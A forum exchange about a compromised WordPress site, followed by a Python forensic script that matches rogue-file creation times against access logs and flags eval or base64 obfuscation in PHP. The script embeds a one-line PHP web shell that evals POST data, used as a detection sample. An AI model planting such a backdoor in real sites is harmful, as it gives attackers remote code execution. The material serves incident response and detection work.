Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
Hi Steve,
No worries, I’m past that moment of being in panic. 😉
I've also pretty much gone through a whole set of security improvements.
Wordfence isn’t my cup of tea. It didn’t really do anything to protect my website, so I’ve moved on to something better: WP Cerber. I’m content with this plugin but we’ll see what the future holds.
That being said, I want to know more about this leak and am looking for someone who recognizes this type of hack or has been in a similar situation.
A site I created was hacked much like yours, odd .php files etc.
– I got the creation dates+times of the rogue files and directories.
– I went to the access logs and looked at what was happening at these times. I also have a journal file of user logins; this let me put together the full story.
The bottom line was that an administrator account was hacked using a user + password scanner.
The hackers uploaded their own plugin, the plugin was highly obscured using lots of base64 and rot13 functions, what it did was an “eval” on whatever [POST] parameters passed to their plugin loaded file. Since POST data is not logged I have no clue what they did. Of course I could see which files they were accessing.
I disabled the hacked admin user login, renamed their plugin directory, took the website offline by renaming the website root directory.
Rebuilt the website, scanned the database for weird stuff and reloaded it.
Months later I still get hundreds of login attempts a day that trip lockouts.
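The investigation described in the post above (file creation times, then the access log around those times, then a look at the dropped plugin for eval/base64/rot13) can be scripted. The following is an added example, not code from either poster: it assumes Apache combined-format access logs, and the log lines, the rogue file path and timestamp, and the one-line plugin sample are all constructed for the demonstration.

```python
import re
from datetime import datetime, timedelta

# Constructed: creation times of rogue files, as you would collect them with
# `stat` on the server (the path and timestamp below are made up).
ROGUE_FILES = {
    "wp-content/plugins/wp-cachee/loader.php": datetime(2024, 3, 2, 3, 14, 7),
}

# Constructed Apache combined-format access log excerpt (not real traffic).
ACCESS_LOG = """\
203.0.113.9 - - [02/Mar/2024:03:12:51 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Mar/2024:03:12:52 +0000] "POST /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Mar/2024:03:13:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Mar/2024:03:14:05 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Mar/2024:03:15:30 +0000] "POST /wp-content/plugins/wp-cachee/loader.php HTTP/1.1" 200 88 "-" "curl/8.0"
198.51.100.4 - - [02/Mar/2024:09:02:11 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 10422 "-" "Mozilla/5.0"
"""

# Constructed one-line plugin body of the kind the post describes: eval on POST data.
SAMPLE_PLUGIN = '<?php @eval(str_rot13(base64_decode($_POST["x"])));'

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        entries.append({
            "ip": m.group("ip"),
            "ts": ts.replace(tzinfo=None),   # naive UTC, to compare with stat times
            "method": m.group("method"),
            "path": m.group("path"),
            "status": int(m.group("status")),
        })
    return entries

def requests_near(entries, when, minutes=5):
    """All requests within +/- `minutes` of a file creation time."""
    window = timedelta(minutes=minutes)
    return [e for e in entries if abs(e["ts"] - when) <= window]

def investigate(rogue_files, log_text, minutes=5):
    """For each rogue file: nearby requests, the IPs behind them, and any
    direct hits on the file itself (the post-install use of the backdoor)."""
    entries = parse_log(log_text)
    report = {}
    for path, created in rogue_files.items():
        near = requests_near(entries, created, minutes)
        report[path] = {
            "requests": near,
            "ips": sorted({e["ip"] for e in near}),
            "direct_hits": [e for e in entries
                            if e["path"].lstrip("/").split("?")[0] == path],
        }
    return report

SUSPICIOUS = re.compile(r'\b(eval|base64_decode|str_rot13|gzinflate)\s*\(', re.I)

def suspicious_php(source):
    """Return the obfuscation/eval functions used in a PHP source string and
    whether eval is fed from request input ($_POST/$_REQUEST/$_GET)."""
    names = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(source)})
    eval_on_input = bool(re.search(r'eval\s*\(.*\$_(POST|REQUEST|GET)',
                                   source, re.I | re.S))
    return names, eval_on_input

if __name__ == "__main__":
    for path, info in investigate(ROGUE_FILES, ACCESS_LOG).items():
        print(f"{path}: {len(info['requests'])} requests within 5 min from {info['ips']}")
        for e in info["requests"]:
            print(f"  {e['ts']} {e['ip']} {e['method']} {e['path']} {e['status']}")
        print(f"  direct hits on the file: {len(info['direct_hits'])}")
    print("plugin sample:", suspicious_php(SAMPLE_PLUGIN))
```

The correlation step is what turns "odd .php files" into a story: the login POSTs that precede the plugin upload give the source IP and the time of the account compromise, and the later direct hits on the dropped file show it being used. As the post notes, POST bodies are not in the access log, so what was executed is still unknown; the plugin scan only tells you that the file is an eval-on-input backdoor, which is enough to justify rebuilding rather than cleaning.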